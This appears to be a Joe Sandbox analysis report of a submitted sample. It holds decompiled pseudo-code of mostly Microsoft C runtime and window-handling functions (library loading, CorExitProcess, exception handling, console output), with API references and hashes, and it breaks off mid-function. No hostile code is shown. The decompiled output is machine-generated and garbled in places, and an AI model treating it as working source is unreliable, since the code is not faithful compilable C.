			E001B2369(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x1c60b0 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x1bcae0 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x1c60b0 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x1c60b0 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E001B4A59(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E001B4A59(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}

0x001b2372
0x001b2407
0x001b237a
0x001b237c
0x001b2386
0x001b238b
0x001b2398
0x001b23ad
0x001b23b1
0x001b2417
0x001b241c
0x001b2423
0x001b2427
0x001b242a
0x001b242a
0x001b2430
0x001b2430
0x001b2412
0x001b2416
0x001b2416
0x001b23b3
0x001b23bc
0x001b23f5
0x001b2402
0x001b2404
0x001b2404
0x00000000
0x001b2404
0x001b23c6
0x001b23cb
0x001b23d0
0x00000000
0x00000000
0x001b23da
0x001b23df
0x001b23e4
0x00000000
0x00000000
0x001b23e9
0x001b23ef
0x001b23f3
0x00000000
0x00000000
0x00000000
0x001b23f3
0x001b2390
0x00000000
0x00000000
0x00000000
0x001b2396
0x001b2410
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,33DA424A,?,001B2476,?,001B0F65,00000000,00000000), ref: 001B242A

Strings

api-ms-, xrefs: 001B23C0
ext-ms-, xrefs: 001B23D4

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: a26994648e50d9981f82366ff06e8da5822bdd790bfac6009923227f292f209f
Instruction ID: 10ad7a3883c3b51f7e5908a30d6234349cbceac3aa1af2f00a5240302b59cf5d
Opcode Fuzzy Hash: a26994648e50d9981f82366ff06e8da5822bdd790bfac6009923227f292f209f
Instruction Fuzzy Hash: AC210A31A40211A7CB219BA1EC44FDA3B68EB56770F254225FD13A7AA1EB74ED04C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 001B1C7C Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E001B1C7C(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x1c4064 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E001B5FC6(_t13,  *0x1c4064);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E001B6001(_t14,  *0x1c4064, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E001B0F42();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E001B6001(_t18,  *0x1c4064, 0);
								} else {
									_t8 = E001B6001(_t18,  *0x1c4064, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E001B0F4D(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x001b1c7c
0x001b1c83
0x001b1c96
0x001b1c9d
0x001b1c9f
0x001b1ca3
0x001b1cbc
0x001b1cbc
0x001b1ca5
0x001b1ca7
0x001b1cba
0x001b1cc1
0x001b1cca
0x001b1ccd
0x001b1cd0
0x001b1ce4
0x001b1ce4
0x001b1ced
0x001b1cd2
0x001b1cd9
0x001b1cdf
0x001b1ce2
0x001b1cf6
0x001b1cf8
0x00000000
0x00000000
0x00000000
0x001b1ce2
0x001b1cfb
0x00000000
0x00000000
0x00000000
0x001b1cba
0x001b1ca7
0x001b1d03
0x001b1d0d
0x001b1c85
0x001b1c87
0x001b1c87

APIs

GetLastError.KERNEL32(?,?,001B1C73,001ADD33,001AD88B), ref: 001B1C8A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001B1C98
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001B1CB1
SetLastError.KERNEL32(00000000,001B1C73,001ADD33,001AD88B), ref: 001B1D03

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: c68a6a288b1152de5adb7c08cd571c133e6c65d52d4b4e262ba31f36247a4dfd
Instruction ID: 23fd2b206ce025de51c3ce25e45ff5017cc2b2e0b7271a0f22aa36c22e7fb255
Opcode Fuzzy Hash: c68a6a288b1152de5adb7c08cd571c133e6c65d52d4b4e262ba31f36247a4dfd
Instruction Fuzzy Hash: BA01D43228D3117FA72527F57CAADEB2F94DB65374772022EFA11804E1EF118C915244

Uniqueness

Uniqueness Score: -1.00%

Function 001AB420 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 001AB453
DestroyCaret.USER32 ref: 001AB466
DeleteObject.GDI32 ref: 001AB48E
CreateBitmap.GDI32 ref: 001AB63B

Strings

d, xrefs: 001AB4B7

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: BitmapCaretCreateDeleteDestroyFocusObject
String ID: d
API String ID: 3626877506-2564639436
Opcode ID: 676835c6d5bffd31341896983623744715a730bd9a71789a5d5bd587276df3ef
Instruction ID: 75e942415648241cb8898a700b90cba71395d9153cd56eddc11670d1d04df35f
Opcode Fuzzy Hash: 676835c6d5bffd31341896983623744715a730bd9a71789a5d5bd587276df3ef
Instruction Fuzzy Hash: BA71C379A04209DFCB04CF58C098AADBBF1FF49315F1584A9E899DB362D735E980CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001A3370 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

GetDpiForSystem.USER32 ref: 001A33DC
MulDiv.KERNEL32 ref: 001A33F5
GetDpiForSystem.USER32 ref: 001A3406
MulDiv.KERNEL32 ref: 001A341F

Strings

`, xrefs: 001A3417

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: System
String ID: `
API String ID: 3470857405-2679148245
Opcode ID: 038aeb8c62d81b81b4747bbeb350f82876859aa107e09abae31763a37754a7e1
Instruction ID: 3b041e53eee740a24e33f7be34b0487e9ab919d138ee91395157337d73b6ce4a
Opcode Fuzzy Hash: 038aeb8c62d81b81b4747bbeb350f82876859aa107e09abae31763a37754a7e1
Instruction Fuzzy Hash: 77411FB8504208AFD740EF58D598B9ABBE0FB48314F01C55AEC698F362D7B9D948DF41

Uniqueness

Uniqueness Score: -1.00%

Function 001B001C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E001B001C(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x1c4050; // 0x33da424a
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x1baf36, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x1c7000(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}

0x001b0031
0x001b003c
0x001b0042
0x001b0046
0x001b0051
0x001b0059
0x001b0063
0x001b0069
0x001b006d
0x001b0074
0x001b007a
0x001b007a
0x001b006d
0x001b0080
0x001b0085
0x001b0085
0x001b008e
0x001b0098

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,33DA424A,?,?,00000000,001BAF36,000000FF,?,001B00E6,001AFF81,?,001B0182,00000000), ref: 001B0051
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001B0063
FreeLibrary.KERNEL32(00000000,?,?,00000000,001BAF36,000000FF,?,001B00E6,001AFF81,?,001B0182,00000000), ref: 001B0085

Strings

mscoree.dll, xrefs: 001B004A
CorExitProcess, xrefs: 001B005B

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9318d00925e7b5c4ecf63a1c28aff23f3445c6c8c02d563548292a29d7f11476
Instruction ID: 1c8fd8126fbde073ede8820a0ea0e53ad5a77b3390115e13c76de670151123d9
Opcode Fuzzy Hash: 9318d00925e7b5c4ecf63a1c28aff23f3445c6c8c02d563548292a29d7f11476
Instruction Fuzzy Hash: A501A271944615EFCB229F90DC09FFFBBB8FB09B51F000629F812A2690DB74D940CA90

Uniqueness

Uniqueness Score: -1.00%

Function 001AA450 Relevance: 7.5, APIs: 5, Instructions: 47windowclipboardCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32 ref: 001AA48A
IsClipboardFormatAvailable.USER32 ref: 001AA49A
EnableMenuItem.USER32 ref: 001AA4C7
EnableMenuItem.USER32 ref: 001AA4E6
EnableMenuItem.USER32 ref: 001AA505

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: EnableItemMenu$AvailableClipboardFormat
String ID:
API String ID: 4217543366-0
Opcode ID: 3b3fecc69610f8dedf61906ac4046866609f2fc481a45573c3378340e61c1f65
Instruction ID: a245066ccd70a50680daaf652023644215d4816029c1a43f5dab89d1520f04f2
Opcode Fuzzy Hash: 3b3fecc69610f8dedf61906ac4046866609f2fc481a45573c3378340e61c1f65
Instruction Fuzzy Hash: 96119874604204AFD744EF68D599B9EBFE0EB84701F00C42DEC89CB355EB74D8949B56

Uniqueness

Uniqueness Score: -1.00%

Function 001B7EA7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 59%

			E001B7EA7(void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v80;
				void* __ebx;
				void* __ebp;
				void* _t57;
				void* _t58;
				char _t59;
				intOrPtr* _t64;
				void* _t65;
				intOrPtr* _t70;
				void* _t73;
				signed char* _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t85;
				signed int _t86;
				signed char _t91;
				signed int _t94;
				void* _t102;
				void* _t107;
				void* _t113;
				void* _t115;

				_t102 = __esi;
				_t93 = __edx;
				_t81 = __ecx;
				_t79 = _a4;
				if( *_t79 == 0x80000003) {
					return _t57;
				} else {
					_push(__esi);
					_push(__edi);
					_t58 = E001B1C6E(_t79, __ecx, __edx, __edi, __esi);
					if( *((intOrPtr*)(_t58 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t102 = _t58;
						if( *((intOrPtr*)(E001B1C6E(_t79, __ecx, __edx, 0, _t102) + 8)) != _t102 &&  *_t79 != 0xe0434f4d &&  *_t79 != 0xe0434352) {
							_t70 = E001B430E(__edx, 0, _t102, _t79, _a8, _a12, _a16, _a20, _a28, _a32);
							_t113 = _t113 + 0x1c;
							if(_t70 != 0) {
								L16:
								return _t70;
							}
						}
					}
					_t59 = _a20;
					_v24 = _t59;
					_v20 = 0;
					if( *((intOrPtr*)(_t59 + 0xc)) > 0) {
						E001B41BE(_t81,  &_v40,  &_v24, _a24, _a16, _t59, _a28);
						_t94 = _v36;
						_t115 = _t113 + 0x18;
						_t70 = _v40;
						_v16 = _t70;
						_v8 = _t94;
						if(_t94 < _v28) {
							_t85 = _t94 * 0x14;
							_v12 = _t85;
							do {
								_t86 = 5;
								_t73 = memcpy( &_v60,  *((intOrPtr*)( *_t70 + 0x10)) + _t85, _t86 << 2);
								_t115 = _t115 + 0xc;
								if(_v60 <= _t73 && _t73 <= _v56) {
									_t76 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t91 = _t76[4];
									if(_t91 == 0 ||  *((char*)(_t91 + 8)) == 0) {
										if(( *_t76 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E001B7E27(_t94, _t79, _a8, _a12, _a16, _a20, _t76, 0,  &_v60, _a28, _a32);
											_t94 = _v8;
											_t115 = _t115 + 0x30;
										}
									}
								}
								_t94 = _t94 + 1;
								_t70 = _v16;
								_t85 = _v12 + 0x14;
								_v8 = _t94;
								_v12 = _t85;
							} while (_t94 < _v28);
						}
						goto L16;
					}
					E001B1BDC(_t79, _t81, _t93, 0, _t102);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_v80 = _v64 + 0xc;
					_t64 = E001B6200(_v68, _v60);
					_t65 =  *_t64(0, _t102, _t113, _t81, _t79, _t107);
					_pop(_t110);
					_t83 = _v60;
					if(_v60 == 0x100) {
						_t83 = 2;
					}
					return E001B6200(_t65, _t83);
				}
			}

0x001b7ea7
0x001b7ea7
0x001b7ea7
0x001b7eae
0x001b7eb7
0x001b7fd6
0x001b7ebd
0x001b7ebd
0x001b7ebe
0x001b7ebf
0x001b7ec9
0x001b7ecc
0x001b7ed2
0x001b7edc
0x001b7f01
0x001b7f06
0x001b7f0b
0x001b7fd2
0x00000000
0x001b7fd3
0x001b7f0b
0x001b7edc
0x001b7f11
0x001b7f14
0x001b7f17
0x001b7f1d
0x001b7f35
0x001b7f3a
0x001b7f3d
0x001b7f40
0x001b7f43
0x001b7f46
0x001b7f4c
0x001b7f52
0x001b7f55
0x001b7f58
0x001b7f67
0x001b7f68
0x001b7f68
0x001b7f6d
0x001b7f80
0x001b7f82
0x001b7f87
0x001b7f92
0x001b7f94
0x001b7f96
0x001b7fb2
0x001b7fb7
0x001b7fba
0x001b7fba
0x001b7f92
0x001b7f87
0x001b7fc0
0x001b7fc1
0x001b7fc4
0x001b7fc7
0x001b7fca
0x001b7fcd
0x001b7f58
0x00000000
0x001b7f4c
0x001b7fd7
0x001b7fdc
0x001b7fdd
0x001b7fde
0x001b7fdf
0x001b7fee
0x001b7ffe
0x001b8005
0x001b800b
0x001b800c
0x001b8018
0x001b801a
0x001b801a
0x001b8029
0x001b8029

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,001B7DAD,?,?,00000000,00000000,00000000,?), ref: 001B7ECC
CatchIt.LIBVCRUNTIME ref: 001B7FB2

Strings

MOC, xrefs: 001B7EDE
RCC, xrefs: 001B7EE6

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 6ab6e5ded9f36eb299294852a5e6643842a81ae93df6aee26297fd678ab072b1
Instruction ID: aac7317526c3d8fcae547adf5ce74dca8a431a1dabb511d4619b204dba5a4d42
Opcode Fuzzy Hash: 6ab6e5ded9f36eb299294852a5e6643842a81ae93df6aee26297fd678ab072b1
Instruction Fuzzy Hash: A0414871904209AFCF15DF98CC81AFEBBB5FF88304F158099FA24A72A1D335A950DB65

Uniqueness

Uniqueness Score: -1.00%

Function 001A31B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41timewindowCOMMON

Download Yara Rule

APIs

SetTimer.USER32 ref: 001A322B
PostMessageW.USER32 ref: 001A325F

Strings

2, xrefs: 001A321B
2, xrefs: 001A31BC

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: MessagePostTimer
String ID: 2$2
API String ID: 2370412193-3784399050
Opcode ID: 6fa63af0bdb46e89eb67625d93faf9ebe5efc556def27748f3b60e6a6c4443d2
Instruction ID: 99fedfeb5d742f0493cddb39186518120f55a1b05a990e2189b740646e7da13b
Opcode Fuzzy Hash: 6fa63af0bdb46e89eb67625d93faf9ebe5efc556def27748f3b60e6a6c4443d2
Instruction Fuzzy Hash: BF1193B4108204EFD744EF58C148BA97BE0BB05354F85C4A9F89D8B2A2D7B5DA88DF52

Uniqueness

Uniqueness Score: -1.00%

Function 001B6086 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E001B6086(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E001B4A59(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x001b6093
0x001b609b
0x001b60d0
0x001b609d
0x001b60a6
0x00000000
0x001b60cd
0x001b60cc
0x001b60cc

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,001B6122,?,?,00000000,?,?,?,001B5F6A,00000000,FlsAlloc,001BD668,001BD670), ref: 001B6093
GetLastError.KERNEL32(?,001B6122,?,?,00000000,?,?,?,001B5F6A,00000000,FlsAlloc,001BD668,001BD670,?,?,001B1C2A), ref: 001B609D
LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,001B1C2A,001B1D0E,00000003,001B148B,?,?,?,?,00000000,00000000,00000000), ref: 001B60C5

Strings

api-ms-, xrefs: 001B60AA

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 9542909fecd8daa0383a1a262f7ae3af3dee56b5a7c48812cc8f9b48020d92c6
Instruction ID: e2d25c63f532c46914f6e83e914b63616c909a0454b4d1a69b71694d203508e2
Opcode Fuzzy Hash: 9542909fecd8daa0383a1a262f7ae3af3dee56b5a7c48812cc8f9b48020d92c6
Instruction Fuzzy Hash: 8EE0B8306C0305B7DB202FA2EC0AFA93F65BB21B51F104025F90EA98E6D765D9549595

Uniqueness

Uniqueness Score: -1.00%

Function 001B69C1 Relevance: 6.3, APIs: 4, Instructions: 338
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E001B69C1(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(0x1baf8d);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0x1c4050; // 0x33da424a
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x1c62e0 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E001B1490(_t265, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x1c62e0 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x1c62e0 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x1c62e0 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E001B8745(_t273,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E001B8745(_t273);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
